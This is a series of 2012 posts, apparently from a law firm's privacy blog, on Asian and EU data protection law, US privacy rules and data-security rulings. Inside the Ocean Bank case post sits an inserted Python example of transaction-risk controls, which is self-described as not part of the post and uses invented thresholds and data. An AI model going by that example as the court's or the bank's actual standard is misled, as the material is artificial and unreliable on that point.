Macau, Hong Kong and Taiwan have been flexing their data protection muscles. Macau’s Office for Personal Data Protection (“OPDP”) is investigating the transfer of data from the Asian subsidiary of Las Vegas Sands to the United States. Hong Kong has just passed the Personal Data (Privacy) (Amendment) Ordinance that increases penalties and introduces new offences. Taiwan has added stronger enforcement powers to its Personal Information Protection Act (“PIPA”).

In Macau, the OPDP is investigating Sands China Limited’s subsidiary, Venetian Macau Limited, for potential violations of Macau's privacy laws, which prohibit the unsanctioned transfer of personal data to foreign jurisdictions, such as to the United States. The investigation relates to the movement of files from Macau to the United States relevant to a 2010 lawsuit. Violations of Macau's 2005 Personal Data Protection Act (“PDPA”) can be subject to civil and criminal penalties, with fines per violation of 80,000MOP (around $10,000) and a maximum jail sentence of two years. Macau has previously fined Google 30,000MOP for breaching the PDPA.

Hong Kong enacted an amendment to the Personal Data (Privacy) Ordinance in June 2012; however, most provisions will come into effect 1 October 2012. The changes particularly affect organisations engaged in direct marketing or that provide data for direct marketing. The Privacy Commissioner’s Office (“PCO”) is scheduled to provide guidance on the new compliance regime, which includes enforcement powers for the PCO such as fines of between HK$500,000 and HK$1 million ($64,500 - $129,000). The maximum fine is for a new offence designed to address malicious disclosure of personal data without consent, where the perpetrator has made financial gain, caused financial loss, or caused psychological harm to the data subject. The new law also includes:

  • An exemption relating to the use of personal data in relation to due diligence
  • Requirements for data users to adopt contractual means to prevent personal data that has been transferred to a data controller from being kept longer than necessary, and to prevent unauthorised access, unauthorised use or loss of personal data 
  • A new right for individuals who have suffered harm as a result of a breach of the Data Protection Law to apply to the PCO for assistance

Taiwan amended its Computer Processed Personal Data Protection Act (“CPPDPA”) more than two years ago when it enacted the new Personal Information Protection Act (“PIPA”). PIPA is finally set to come into force next year, but the legislature can continue to make further amendments up until 30 April 2012. Enforcement under the old CPPDPA had been haphazard and intermittent, mainly because there was no single agency responsible for enforcement. Under PIPA, the Ministry of Justice has been identified as the agency responsible for coordinating enforcement. Recently, however, Taiwan’s financial services regulator (the “FSC”) imposed substantial fines against banks on privacy-related grounds, rather than wait for PIPA to be enacted. In March 2012, the FSC fined two insurance brokers NT$600,000 ($20,000) each for illegally releasing personal data to a life insurance company.

The Council of the European Union issues suggested amendments to the Proposed EU Data Protection Regulation

This post was written by Cynthia O'Donoghue.

The Council of the European Union has published a new review detailing comments on the draft proposal for a General Data Protection Regulation (“Draft Regulation” or “Regulation”). Building on comments made in the DAPIX document, the review contains comments from each EU Member State with suggested changes to the first and second chapters of the Draft Regulation.

Most of the Member States commented on the excessive number of delegated acts which allow the European Commission considerable powers of discretion, and many sought to delete some, if not all, of those delegated acts. Other general comments focused on the territorial and material scope of the Regulation and the fact that some Member States would have preferred a directive (requiring national implementing legislation) to a regulation (direct effect).

Many of the Member States highlighted similar issues with Articles 1-10 of the Draft Regulation, namely:

  • In relation to Article 1 (subject matter and objectives), revision or deletion of paragraph 3 as its impact could reduce the scope of the right to protection of personal data.
  • Frequent comments on Article 2 (material scope) were that the exemption in paragraph 2(2)(d) does not take into account the ECJ judgment in Lindqvist, where data is made available on the Internet; that the exemption under 2(2)(b) for EU institutions, bodies, offices and agencies should be deleted; and that the concept of ‘national security’ in 2(2)(a) is too vague.
  • The extension of jurisdiction in Article 3 (territorial scope) outside of the EU was considered unworkable and potentially unenforceable.
  • A change to the definition of ‘personal data’ in Article 4 to include anonymised and/or pseudonymised data, together with comments that the definitions of genetic data, biometric data and data concerning health were all too wide.
  • Article 5 (principles relating to personal data processing) should give greater consideration to the use of pseudonymised data, and that paragraph (f) was considered too general and imprecise, thus creating an excessive liability on a data processor.
  • Most Member States had drafting issues or additions to Article 6 (lawfulness of processing), including in relation to processing for ‘legitimate interests’.
  • Member States welcomed the provision that the controller shall bear the burden of proof for obtaining the data subject’s consent in Article 7 (Conditions for consent), although some questioned the form of consent required.
  • Almost all of the Member States had issues with the intended scope of Article 8 (Processing of child personal data), questioning how controllers are supposed to identify and verify the age of children online, and noting that it may interfere with national age limits and systems.
  • In relation to Article 9 (processing special categories of data), Member States questioned whether consent was required in all cases and whether ‘beliefs’ was considered to be too wide.
  • Most Member States had reservations around the wording of Article 10 (Processing not allowing identification), either querying its necessity or questioning its meaning and opting for its deletion.

The document will be discussed in greater detail in our upcoming Client Alert. We will issue Part 2 when the next stage of the review is published.

UK Ministry of Justice publishes Responses to its Call for Evidence on the Proposed EU Data Protection Framework

This post was written by Cynthia O'Donoghue.

Back in January of this year, the European Commission published its proposed framework to replace the Data Protection Directive (95/46/EC). Shortly after, the UK Ministry of Justice (MOJ) issued a Call for Evidence, which sought information on the potential impact of the draft EU Data Protection Regulation and accompanying directive for law enforcement (‘Framework’). At the end of June, the MOJ published a summary of the responses. The MOJ received input from 143 organisations from various sectors, including advertising, financial services, technology and telecoms, media and the legal field. The responses will be used to help the UK Government reach an informed view on the Framework.

The majority of respondents recognised the need for change to the current data protection law and were positive about the change being in the form of a regulation. Members of the public and certain rights groups particularly felt that the Framework did a good job of addressing key consumer concerns and gave individuals more rights to control how their personal data is processed.

However, a large number of public and private sector organisations took a different view, commenting that the proposed Data Protection Regulation would increase the administrative burden because of its overly prescriptive nature and that it lacks balance between individual rights and the legitimate needs of data controllers. Key concerns focused on the ‘right to be forgotten’, the requirement that data breaches be reported within 24 hours where possible and the imposition of large fines for failing to comply with the Regulation.

Some respondents were of the opinion that the Regulation did not go far enough to take into account important technological changes, such as the growth of the internet and the increased use of social networking sites and geo-location data. Some commented that requirements were “overly-ambitious”, used a ‘one size fits all’ approach and failed to understand the needs of certain types of businesses in relation to specific personal data and the flexibility required to provide a range of services to customers. In particular, social media companies and e-commerce businesses argued that the proposed Regulation would have a negative impact on their core business. Another key comment from the private sector related to the complexity of the Regulation which would most likely require specific guidance from outside counsel.

Others suggested that the Regulation poses a threat to cloud computing and its future development. Respondents stated that ideally what they were looking for is a piece of legislation that is compatible with future technological advances, but at the same time protects an individual’s right to data protection.

In the MOJ’s view the European Commission’s impact assessment did not properly quantify the compliance costs imposed on business and potentially over-estimates the benefits of introducing harmonised legislation.

The UK Government’s stated aim is a legal instrument that does not overburden businesses, public sector or otherwise, and that encourages economic growth and innovation while still protecting individuals’ personal data. The UK Government supports the requirement for transparent processing and the requirement to proactively provide additional information to data subjects in response to subject access requests. The UK intends to push for an overhaul of the proposed ‘right to be forgotten’ due to it being impractical, costly and confusing, although it does support the individual right to delete their personal data where it is appropriate. Most importantly, and what is good news for business, is that the UK Government plans to resist any provisions it feels are bureaucratic and burdensome, such as mandatory data protection impact assessments.

Document from Presidency to Working Party on Data Protection and Exchange of Information ("DAPIX") shows proposed revisions to the new draft data protection Regulation

This post was written by Cynthia O'Donoghue.

A leaked document appears to show proposed changes to the new draft data protection Regulation made by DAPIX on 22 June 2012 confirming that the document is under review by a number of Working Parties of the EU Council. The document includes the full Regulation with changes marked. The introduction to the document states that the proposed changes relate to Articles 1-10, 80(a) and 83. Furthermore, the introduction notes that Belgium, the Czech Republic, Germany and Slovenia have commented that they would prefer a Directive over a Regulation and that almost all delegations think that the proposed Regulation contains too many cases of delegated acts.

Changes to the draft Regulation suggested by European member states through DAPIX included:

  • Deletion of Article 1(3) on the Presidency as the subsection did not make sense in the context of a directly applicable Regulation.
  • Definition of ‘personal data’ in Article 4 amended as some countries felt the definition was incompatible with the digitalised age. Some countries felt greater clarity was required with ‘personal data’ being distinguished from ‘information’. Comments also highlight issues with the definition of ‘biometric data’, the deletion of the definition of ‘child’ by the Presidency and the addition of definitions for ‘third party’ and ‘Information Society Service’.
  • The extension of ‘processing’ under Article 5 to include processing for historical, statistical and scientific purposes.
  • The inclusion of additional lawful processing purposes added to cover certain categories of sensitive data and processing necessary under Articles 80 to 85 (journalism, scientific or artistic purposes, vital interests of the data subject and historical, statistical and scientific processing).
  • The inclusion of biometric data within the concept of sensitive personal data.
  • Redrafting of Article 10 which relates to processing that does not allow identification.
  • Addition of Article 80a that says “Member States may determine the conditions for the processing of a national identification number or any other identifier of general application”.
  • Drafting added to the safeguards in Article 83 which widens the reasons in relation to processing for historical, statistical and scientific purposes.

The draft Regulation is currently under discussion with a number of parties (including the Article 29 Working Party) within the EU and all amendments made are only DAPIX suggestions and are still subject to further review. Time will tell whether any of the suggestions in this document will be included in the next draft of the Regulation.

Binding Corporate Rules for Processors

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (the “Working Party”) has issued a Working Document intended as a “toolbox” for the use of Binding Corporate Rules (“BCRs”) for Processors, aimed at both companies and data protection authorities. This document describes the conditions which must be met and includes a full checklist of requirements. The intention is that this toolbox will build on the Working Party’s previous guidance on BCRs set out in Opinions WP153 and WP155.

BCRs are internal rules aimed at helping large multinational companies transfer data between their various geographies through the creation of binding principles, but had been principally aimed at companies that are data controllers. BCRs can be used as an alternative to the Safe Harbor Principles (where there is a transfer to the U.S.) or the Standard Model Clauses adopted by the European Commission. Processor BCRs provide a framework for the international transfer of personal data processed by a company as a data processor that must follow the processing instructions of an external data controller, for example, in third-party outsourcing situations or for the use of cloud computing.

The toolbox sets out a list of minimum requirements, including:

  • a general description of both the data processing and geographic scope of the BCRs and a list of those entities adhering to the BCRs;
  • a clear duty on all members of the Group and their employees to respect the BCRs;
  • an explanation of how the rules are binding on each group entity and on individual employees;
  • a clear duty for each entity to cooperate with data protection authorities (DPAs) and for the primary data processor to cooperate with the controller; and
  • a grant of third-party beneficiary rights on data subjects in the event the data controller factually disappears, ceases to exist in law or becomes insolvent.

The BCRs would also be binding on the controller in that they would form part of the agreement between controller and processor, and in addition, processors may be obliged to publish the BCRs on their website.

A key provision of Processor BCRs is the liability it would impose on a processor’s main EU group member, as that company would assume liability for breaches committed by members outside of the EU or by third-party sub-processors and would include confirmation of that company having sufficient assets to shoulder the liability.

Other requirements of the Processor BCRs include confirmation of a training programme in place, an audit programme and a complaint handling process including a network of privacy officers for handling complaints. The Processor BCRs need to specify the relationship between the BCRs and the relevant applicable data protection law and evidence a commitment that each member company will notify the data controller if they cannot comply with designated data protection legislation or their obligations. Upon receiving such notice, the data controller would have a right to suspend data transfer or terminate the contract.

While modifications to Processor BCRs would be permitted, any changes would have to be reported to the group members, the relevant DPA and the controller, and where the modifications affect the processing, the controller would be able to object or terminate the agreement. Only updates to the BCRs or the list of processor members would be exempt from any reapplication.

The toolbox provides some guidance on subprocessing by member and non-member companies, including the subcontracting of processing under the controller/processor agreement of the Processor BCRs, which is permitted only with the controller’s prior written consent.

Data controllers would also have obligations in relation to the use of a processor who has agreed to the Processor BCRs, such as informing data subjects of the existence of the Processor BCRs, the existence of processors based outside of the EU and whether any sensitive personal data will be transferred to a third country not providing adequate protection.

FTC Does Not Issue a Final COPPA Rule; Instead, Seeks Comment on Modifications to Rule Definitions

This post was written by John P. Feldman, Amy S. Mushahwar and Christine Nielsen.

This morning the FTC released a supplemental notice of proposed rulemaking on the Children's Online Privacy Protection Act (COPPA) Rule. This is not a final rule. The notice suggests further modifications to proposed definitions released in the September 2011 Notice of Proposed Rulemaking on the COPPA Rule. Specifically, the FTC now seeks comment on proposed modifications to the definitions of "operator," "personal information," and "website or online service directed to children." This notice must be read in conjunction with the 2011 notice to understand the full scope of the proposed changes. The FTC is seeking comments on these proposals. Comments must be received on or before September 10, 2012. Shortly, we will be providing a detailed analysis of this notice in context with the earlier release.

Maryland Prohibits Employers from Requesting Employee or Applicant Social Media Log-In Information - Illinois and Other States to Follow?

This post was written by Frederick Lah.

Earlier this year, Maryland enacted the nation's first law explicitly prohibiting employers from requesting or requiring employees or applicants to disclose their usernames and passwords for their personal social media accounts. Many other states are contemplating similar laws, with Illinois' version likely to become law within the next couple of months.

Please click here to read the full post on our sister blog, AdLaw By Request.

France: The CNIL amends its regulation concerning the processing of client/prospect data and imposes differentiated data retention periods

This post was written by Daniel Kadar.

A new regulation of the CNIL, dated 12 June 2012 and published on 13 July 2012, modifies the ways and means of collecting and processing client/prospect-related data.

  1. The regulation, issued as an amendment to the “Simplified Norm No. 48” [http://www.cnil.fr/en-savoir-plus/deliberations/deliberation/delib/184/], broadens the possibility for data controllers to make a simplified notification to the CNIL (in which the data controller barely confirms adherence to the rules of such regulation) rather than using the regular notification process.

    In addition to client prospecting activities, the new regulation explicitly mentions audience measurement, quality measurement activities and sweepstakes (with the explicit exception of online gambling). Banking and insurance activities, as well as health or education-related activities, are excluded from the scope of this Simplified Norm.

  2. The main improvement of this new regulation is to impose differentiated data retention periods depending on the nature of the data to be processed. In that regard, prospecting data related to prospects is now aligned with the data retention period for client prospecting material, and can now be retained for three years after collection, compared to the one-year period that previously applied. The regulation adds that the data controller will have the option to renew this retention period for another three years if the explicit consent of the data owner is obtained.

    Data evidencing the existence of a right or of a contract can be kept five years after contract termination. Accounting documents can be kept 10 years.

    Among other categories, credit card-related data can be retained for a maximum of 13 months after the transaction (15 months for a deferred debit card) as evidence.

    The retention period of audience measurement data is six months after their collection. Cookies can be retained during the same period of time.

  3. The regulation also provides important specifications as to how prospecting activities must be handled:
    • The client/prospect must in all cases be informed of the purpose of the collection of his/her data by the data controller and of his/her right of access, modification or opposition with the indication of a valid address in that regard.
    • In addition, any kind of automated prospecting (email, SMS, MMS) is subject to the data owner’s consent. The regulation adds that it is not sufficient to include such provisions in the General Terms of Use / General Conditions. Consent must therefore be explicit and separate.
    • Prospecting with “human intervention” can only be done if the data owner is granted the right to oppose “in a simple manner” such processing.

  4. Whilst this Simplified Norm allows the transfer of data to non-EU countries provided that the data importer has agreed to guarantee an EU-equivalent level of data protection (through Safe Harbor membership where applicable, by subscribing to a data transfer agreement including the EU model clauses, or by implementing binding corporate rules (BCRs)), it shall not apply to any data processing “likely to exclude a data owner from the benefit of a right or from a contract or service.” In such a case, the CNIL will require an authorization procedure.
     
  5. This new regulation, which amends the “Simplified Norm No. 48,” will force a number of data controllers to adapt their internal procedures, in particular as to data retention periods. The CNIL has therefore imposed a transition period of 12 months from the date of publication of the new regulation (i.e. until 13 July 2013).

FERC Issues Order to Investigate Possible Violations of its Cyber Security Protocols for the Electric Grid

This post was written by Amy Koch, Amy Mushahwar and Christine Nielsen.

The Federal Energy Regulatory Commission (FERC) issued an order on July 20, 2012 to investigate whether any Authorized Certification Authorities (ACAs) had violated the North American Energy Standards Board (NAESB) Public Key Infrastructure (PKI) Standards, which outline various security requirements and specifications for the electric grid.[1] The Order requires all ACAs (there are currently four) to submit a report to the Commission by July 27 which explains the processes and procedures each ACA uses to validate the identity of individuals requesting digital certificates, and the key lifetimes used for various certificates. There has been great debate about the appropriate lifespan of a digital certificate which would balance the cyber security needs of the grid with the amount of disruption imposed on businesses. In response to these concerns, Senator Joseph Lieberman (I-CT) submitted The Cybersecurity Act of 2012, a compromise bill with bipartisan sponsorship and the support of President Obama. On July 25, Senate Majority Leader Harry Reid (D-NV) invoked cloture to schedule a floor vote on the Cybersecurity Act prior to the Senate’s August recess, which will determine whether the Act will eventually be negotiated in a Conference Committee with members of the House of Representatives and could ultimately lead to a passed bill out of both of the Houses. Any new cyber security legislation which Congress passes could have a profound effect on the way the electric grid and other public-private critical infrastructure is secured. Please click here to read the issued Client Alert.

___________________________________

[1] Reporting on North American Energy Standards Board Public Key Infrastructure Standards, 140 FERC (2012).

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich.

Changes in State Data Privacy Laws to Become Effective Soon

This post was written by Paul Bond and Frederick Lah.

We previously reported on Texas House Bill 300 that was signed into law last year. The new law presents stricter requirements for health privacy and data breach notification obligations. That law is set to become effective September 1, 2012. Two types of entities will be primarily affected by the law: "Covered entities" – as that term is defined under the Texas law – will need to comply with the health privacy requirements. For the breach notification amendment, any person who "conducts business" in Texas and owns or licenses computerized sensitive personal information about "individuals" (not limited to just Texas residents) must comply with the law. For our previous Client Alert on H.B. 300, please click here.

Connecticut is another state that has recently enacted its data breach notification law. Connecticut House Bill 6001 now requires that notification be provided to the attorney general any time notification is required to be given to a resident, at a time "not later than the time when notice is provided to the resident." This change is set to become effective October 1, 2012.

These two upcoming changes follow a busy year in state privacy law amendments. Illinois, California, and Vermont have all amended their data breach notification laws within the past year. We previously covered the Vermont amendments here. Each of these data breach notification laws is currently effective. Also earlier this year, while not an amendment, the grandfather provision under the Massachusetts Regulations with respect to non-compliance for service provider contracts expired. Now, all companies subject to the Regulation must ensure that their contracts with service providers contain a provision to implement and maintain appropriate safeguards. We covered this specific provision here.

Electric Grid Cyber Threat Concerns Raised Last Week During an Intense Push for General Cybersecurity Legislation

This post was written by Amy Koch, Amy Mushahwar and Christine Nielsen.

Since three cyber security bills passed the House in April (H.R.2096, H.R.3523, and H.R.3834), all eyes have been on Washington for cyber security developments in the Senate. This past week there were several. The week began with a hearing on Tuesday, July 17, by the U.S. Senate Committee on Energy and Natural Resources “to examine the status of action taken to ensure that the electric grid is protected from cyber attacks,” inviting witnesses from the Federal Energy Regulatory Commission (FERC), the Government Accountability Office (GAO), North American Electric Reliability Corporation (NERC), and the Public Utilities Commission of Ohio. On Thursday morning, an editorial from President Obama appeared in the Wall Street Journal urging the Senate to pass a cyber security compromise bill. Then, late on Thursday, Sen. Lieberman released the text of a compromise proposal. Please click here to read the issued Client Alert.

Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich.


Article 29 Working Party Issues Opinion on Cloud Computing

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party, which is made up of each of the EU member states’ national data protection authorities, issued an Opinion on cloud computing earlier this month. The Working Party acknowledges that for certain businesses, cloud computing has been an important technological revolution and a key area of development for their technology and computing strategy. The Working Party supports the development of cloud computing and its ability to generate economic benefits to businesses and organisations, given the wide range of cloud services on offer and business demand. The Working Party supports the idea of a European Cloud Partnership strategy in favour of public sector procurement of cloud services, so long as special precautions are taken, especially if it stimulates development of the European cloud market.

Please click here to read the issued Client Alert.

The Article 29 Working Party Issues Opinion on Cloud Computing

This post was written by Cynthia O'Donoghue.

The Article 29 Working Party (the “Working Party”) issued an Opinion on cloud computing that analyses the applicable law, obligations and other relevant issues for cloud service providers operating in the European Economic Area (“EEA”). The Opinion outlines how the wide-scale deployment of cloud computing services could trigger a number of data protection concerns.

The Article 29 Working Party Opinion discusses two main risks. The first relates to the lack of control by the data controller over the personal data processed in a cloud system, which may result in that controller no longer having exclusive control of the data. The second relates to a lack of transparency if the data controller receives insufficient information about the cloud provider’s processing operations. Without adequate information, a data controller may not be aware of the potential threats or risks to the personal data, especially if there is a chain of sub-processing or transfers outside the EEA. This would leave the data controller in a situation where it may be unable to take appropriate action.

The Opinion identifies the Data Protection Directive 95/46/EC as the relevant legal framework for cloud computing, with the legislation of the country in which the data controller is established, rather than the place in which the cloud computing providers are located, being the applicable legislation. If the controller is located outside the EEA, but the cloud provider is located in the EEA, then the provider exports the data protection legislation to the client. The Working Party also confirms that the customer of the cloud services is typically the data controller, with the cloud provider being the data processor.

The Working Party lists a number of data protection requirements that must govern the relationship between the cloud customer (or data controller) and the cloud provider. These are divided into three key areas:

  • Compliance with basic principles such as specific purpose, transparency and erasure of data
  • Safeguards put in place in contract for cloud computing services
  • Responsibility of the data controller to choose a cloud provider that will implement adequate technical and organisational security measures to protect personal data put in the cloud

Finally, the Opinion closes with recommendations aimed at data controllers seeking to put personal data in the cloud, such as conducting a comprehensive and thorough risk analysis which is underpinned by the cloud provider supplying all necessary information for a data controller to assess the pros and cons of using the cloud.

We will be issuing a detailed Client Alert on this important subject.

One Step Closer to Defining 'Reasonable' Data Security Measures?

This post was written by Mark S. Melodia, Paul Bond, and Frederick Lah.

The concept of "reasonableness" is found throughout the law and tends to develop slowly through the common law in a variety of geographies and commercial contexts. This uneven and unpredictable development of case-by-case rulings ultimately provides resilient standards, but at a great interim cost of uncertainty and litigation.

The First Circuit appears to have attempted to take a step toward defining what "reasonableness" means in the data security context. The court recently held that a local Maine bank failed to establish "commercially reasonable" security measures, as defined by the UCC, to prevent numerous fraudulent transactions from an account held by one of its commercial customers. Financial institutions (or any type of company for that matter) face myriad cyber threats pertaining to data security, ranging from malware to phishing schemes to data breaches. Falling prey to one of these threats can later lead to litigation, and quite often, the issue then becomes what kind of measures the company had in place to prevent such threats from being realized. The "reasonableness" of the company's data security measures can serve as an important defense.

In this case, Ocean Bank authorized six apparently fraudulent withdrawals totaling $588,851.26 over the span of seven days, from an account held by Patco Construction Company, after the perpetrators were able to supply Patco's answers to their challenge questions. Ocean Bank was able to recover some of the money but Patco still suffered a residual loss of approximately $345,000. These transactions were processed, without notification to Patco, even though Ocean Bank's security system flagged these transactions as "high-risk" because of their timing, high value, and geographic locations. In addition, Ocean Bank lowered the dollar amount threshold above which a transaction would automatically trigger the challenge questions from $100,000 to $1. This meant that essentially every time Patco initiated a transaction, it would be required to answer the challenge questions. Cyber criminals equipped with keylogging capability therefore had more frequent opportunities to capture all information necessary to compromise an account. This, combined with the fact that Ocean Bank had the capacity to monitor and notify customers about suspicious activity but didn't do so, led the court to hold that its security system was commercially unreasonable. It should be noted that the court's finding was one of "unreasonableness" with respect to this specific set of facts, and that the court did not attempt to expressly set forth what measures would need to be in place to be considered "reasonable."

The apparently favorable ruling for plaintiff's attorneys raises the question of what exactly is a "commercially reasonable" security standard. In some way, the holding seems to suggest that banks should implement stronger security measures, especially if they have had recurring issues with data security. As for the use of challenge questions as a backstop, the court also placed emphasis on the fact that Ocean Bank's security vendor previously cautioned that challenge questions are quicker and simpler to adopt, but are less secure. On the other hand, no security system can ever be completely secure, so it's important for banks to objectively and realistically assess the entirety of their security systems to make sure they are prioritizing their efforts on the areas that pose the biggest security risks. Banks should combine both employee-driven policies and technology-based solutions for the most effective data security programs. What's additionally important to note here is the First Circuit's suggestion that customers also have "obligations and responsibilities" under the UCC. The court cited other sections from the UCC where a customer has a "duty of ordinary care," but stopped short of setting forth any similar standard here, stating that, "[i]t is unclear, however, what, if any, obligations a commercial customer has when a bank's security system is found to be commercially unreasonable." The court left that question to be briefed on remand.
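The control failures the court describes are easier to see side by side in code. The following is an added example, not anything from the post, the bank or the court: a small risk-based transaction control with two policies, one that mirrors the configuration described above (challenge questions above $1, risk flags raised but the transaction still processed without notifying the customer) and a hardened one that challenges only above a sensible amount and holds and notifies on any flag. The transactions, the business-hours window, the high-value line and the country codes are constructed for illustration; the $100,000 figure is the threshold the post says the bank originally used.

```python
"""Risk-based transaction controls, contrasting the configuration described in
the Ocean Bank ruling with a hardened policy.  Added example with constructed
transactions; the risk signals and thresholds are assumptions, not the bank's
or the court's rules."""
from dataclasses import dataclass
from datetime import datetime, time


@dataclass(frozen=True)
class Transaction:
    amount: float
    submitted_at: datetime
    source_country: str        # where the online session originated
    home_country: str          # the customer's usual location


@dataclass(frozen=True)
class Policy:
    challenge_threshold: float   # step-up challenge questions above this amount
    hold_flagged: bool           # hold risk-flagged transactions for review
    notify_on_hold: bool         # tell the customer when a transaction is held


# Weak: challenge on every transaction (threshold $1); flag but still process.
WEAK = Policy(challenge_threshold=1.0, hold_flagged=False, notify_on_hold=False)
# Hardened: challenge only unusual amounts; hold and notify on any risk flag.
HARDENED = Policy(challenge_threshold=100_000.0, hold_flagged=True, notify_on_hold=True)

BUSINESS_HOURS = (time(8, 0), time(18, 0))   # assumed window, not from the ruling
HIGH_VALUE = 50_000.0                         # assumed high-value line


def risk_flags(tx: Transaction) -> list[str]:
    """Signals of the kind the ruling mentions: timing, value and geography."""
    flags = []
    if not BUSINESS_HOURS[0] <= tx.submitted_at.time() <= BUSINESS_HOURS[1]:
        flags.append("off_hours")
    if tx.amount >= HIGH_VALUE:
        flags.append("high_value")
    if tx.source_country != tx.home_country:
        flags.append("unusual_geo")
    return flags


def decide(tx: Transaction, policy: Policy) -> dict:
    """Return the control decision for one transaction under a policy."""
    flags = risk_flags(tx)
    challenged = tx.amount > policy.challenge_threshold
    if flags and policy.hold_flagged:
        return {"action": "hold", "challenged": challenged,
                "notify": policy.notify_on_hold, "flags": flags}
    # Either nothing was flagged, or the policy flags without acting on it.
    return {"action": "process", "challenged": challenged,
            "notify": False, "flags": flags}


def challenge_exposure(txs, policy: Policy) -> int:
    """Count the transactions on which the challenge answers must be typed in;
    each prompt is one more chance for a keylogger on the customer's machine
    to capture them."""
    return sum(decide(tx, policy)["challenged"] for tx in txs)


# Constructed sample: three routine daytime domestic payments, plus one
# off-hours, high-value payment from abroad resembling the flagged withdrawals.
ROUTINE = [
    Transaction(500.0, datetime(2012, 5, 7, 10, 15), "US", "US"),
    Transaction(2_400.0, datetime(2012, 5, 8, 14, 30), "US", "US"),
    Transaction(15_000.0, datetime(2012, 5, 9, 9, 5), "US", "US"),
]
SUSPECT = Transaction(98_000.0, datetime(2012, 5, 10, 3, 20), "XX", "US")

if __name__ == "__main__":
    for name, pol in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, "challenge prompts on routine traffic:",
              challenge_exposure(ROUTINE, pol))
        print(name, "suspect transaction:", decide(SUSPECT, pol))
```

Under the weak policy every routine payment prompts for the challenge answers and the suspect payment is flagged three ways yet still processed silently; under the hardened policy routine traffic never exposes the answers and the suspect payment is held with the customer notified. The point a reviewer of such a system should take from the ruling is that a risk signal that is computed but never acted on offers no protection, and that a step-up control applied to everything can itself widen the attack surface.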

This case demonstrates that our courts are still in the early jurisprudential stages of developing a body of law around what is "reasonable" in the data security context.

NIST Releases Draft Policy of Mobile Security Guidelines, Recommends Centralized Mobile Device Management

This post was written by Amy S. Mushahwar.

On July 11, the National Institute of Standards and Technology (“NIST”) released Guidelines for Managing and Securing Mobile Devices in The Enterprise, its draft policy for securing mobile devices that will supplement its already-published general security recommendations for any IT technology. In these draft Guidelines, which are a revision of its 2008 publication Guidelines on Cell Phone and PDA Security, the NIST is updating its mobile security recommendations and focusing on new technologies, specifically smartphones and tablets. Once published, this could become the approved guidelines for all federal agencies and federal contractors, which could be particularly troublesome for those lacking mobile device security policies and other security measures.

Focused on providing cost-effective security guidelines, the NIST recommended centralized mobile device management technologies for both organization-owned and personally-owned (BYOD) devices, which manage the configuration and security of mobile devices while allowing other security features to be added as needed. Additionally, the NIST recommended: (1) developing system threat models for mobile devices and the resources that are accessed through the mobile devices; (2) instituting a mobile device security policy; (3) implementing and testing a prototype of the mobile device solution before putting it into production; (4) securing each organization-issued mobile device before allowing a user to access it; and (5) maintaining mobile device security regularly.

Please click here to read the entire set of Guidelines. The NIST is accepting comments concerning the draft Guidelines until August 14.


Research and drafting assistance for this post was provided by Reed Smith Legal Intern Rachael E. Pashkevich.

Privacy and Insurance: Coverage for Violations of Telephone Consumer Protection Act

This post was written by Timothy P. Law.

This week, Wisconsin became the latest state to join the majority of courts nationwide finding broad general liability insurance coverage for claims alleging violations of the Telephone Consumer Protection Act, ruling that such claims allege publication of material that violates a person’s right of privacy.

Please click here to read the full post on our sister blog, The Policyholder Perspective.

France: The CNIL issues its annual 'Activity Report' for 2011 detailing a significant increase in its activity

This post was written by Daniel Kadar.

“The CNIL is ready for combat” - this is how Mrs. Falque-Pierrotin, President of the CNIL, described its mission after taking office last year.

Introducing a 100-page-long yearly “Activity Report” dated 10 July 2012, fully translated into English, the President of the CNIL outlined what is to be seen as the main action principle of the CNIL for years to come: “enforcement and oversight” of data protection compliance, rather than simply monitoring it.

As our blog has highlighted, the CNIL over the past months has taken several actions, demonstrating its growing position as a powerful regulatory authority:

  • It has issued new regulation principles with regard to data security and cookies, and conducted a broad consultation that led to the partly binding “recommendations” on cloud computing issued two weeks ago.
  • It increased its power of sanction. Google has been fined €100,000 for its Google Street application, and is also under scrutiny by the CNIL because of its new integrated platform which allows “intelligent advertising”. Facebook is also under the CNIL’s watch.
  • It is also a front-runner in challenging the projected new data protection regulation with regard to the issue of jurisdiction and the broadening of exemptions. Under the new regulation, the European Data Protection Authority of the country in which a data controller has its ‘main establishment’ would have sole jurisdiction to rule on complaints against such a data controller, which would reduce the CNIL’s power to control proceedings.

2011 showed a 19 percent increase in the complaints directed to the CNIL by the public (5,738), and 385 controls were implemented (an increase of 25 percent in relation to 2010).

Interestingly, the complaints linked to the “right to be forgotten” were up 42 percent versus the previous year (1,000 complaints), and complaints linked to HR data processing represented 12 percent of the total volume of complaints. Complaints linked to the so-called “cyber-surveillance” tools (monitoring the use of electronic communications by employees) were up 59 percent compared with the previous year. Complaints linked to HR-data breaches were up 27 percent.

The CNIL issued 65 formal notifications, 13 warnings (which are to be considered as sanctions), and five financial penalties, with the largest penalty being €100,000.

The CNIL’s increased activity over the past year and in the first semester of 2012 suggests that last year’s numbers will be exceeded in 2012.

The Article 29 Working Party issues Opinion on cookies

This post was written by Cynthia O'Donoghue.

During its meeting in early June, the Article 29 Working Party (the “Working Party”) issued an Opinion on cookies that analyses the exemptions to the requirement for informed consent, and sets out how the revised e-Privacy Directive impacts cookie usage.

Article 5.3 of the amended ePrivacy Directive 2009/136/EC provides that cookies are exempt from the need to obtain informed consent when a cookie is:

A. used “for the sole purpose of carrying out the transmission of a communication over an electronic communications network” or

B. “strictly necessary in order for the provider of an information society service explicitly requested by the subscriber or user to provide the service”.

The Working Party opined that the restrictive nature of “sole purpose” in A specifically limits this exemption, such that the use of cookies that merely assist, speed up or regulate the transmission of a communication falls outside the informed consent exemption.

To satisfy B above, a cookie has to pass two tests to be exempt:

  • The user must take a positive action to request a service with a clearly defined perimeter
  • The cookie is required, such that if the cookie were disabled, the requested service would not work

The Working Party pointed out that cookies exempt from consent should have a lifespan related to their purpose and must expire once no longer needed, taking into account the reasonable expectations of the average user.

“Third party” cookies are more likely to require consent where they are not strictly necessary, as the data protection risk comes from the purpose(s) for the processing, rather than from the information contained within the cookie.

